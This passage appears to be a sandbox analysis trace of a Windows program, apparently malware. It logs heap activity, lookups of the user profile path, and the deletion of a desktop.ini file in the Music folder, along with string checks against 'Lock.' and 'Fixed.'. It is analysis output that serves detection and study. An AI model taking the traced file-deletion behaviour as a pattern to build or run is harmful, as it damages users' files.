returned 0x34aa400 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0251.711] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0251.711] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0251.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0251.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0251.713] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpFilePart=0x8bedfc*="desktop.ini") returned 0x2f [0251.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0251.713] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini")) returned 0x26 [0251.713] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1245, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa58e0 [0251.713] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini")) returned 1 [0251.714] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1245, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0251.714] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0251.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.715] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0251.715] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.715] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0251.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0251.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0251.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpFilePart=0x8bf658*="desktop.ini") returned 0x2f [0251.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0251.718] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini")) returned 0xffffffff [0251.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0251.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0251.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0251.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0251.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ditreDSOdEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="itreDSOdEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="treDSOdEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="reDSOdEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eDSOdEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DSOdEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SOdEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OdEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dEug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Eug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ug3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tyrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yrxp1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.720] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0251.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ditreDSOdEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="itreDSOdEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="treDSOdEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="reDSOdEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eDSOdEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DSOdEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SOdEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OdEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dEug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Eug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ug3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tyrxp1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.721] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0251.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0251.721] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0251.721] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0251.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.722] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.722] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0251.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.722] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0251.722] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.723] RtlAllocateHeap (HeapHandle=0x25c0000, 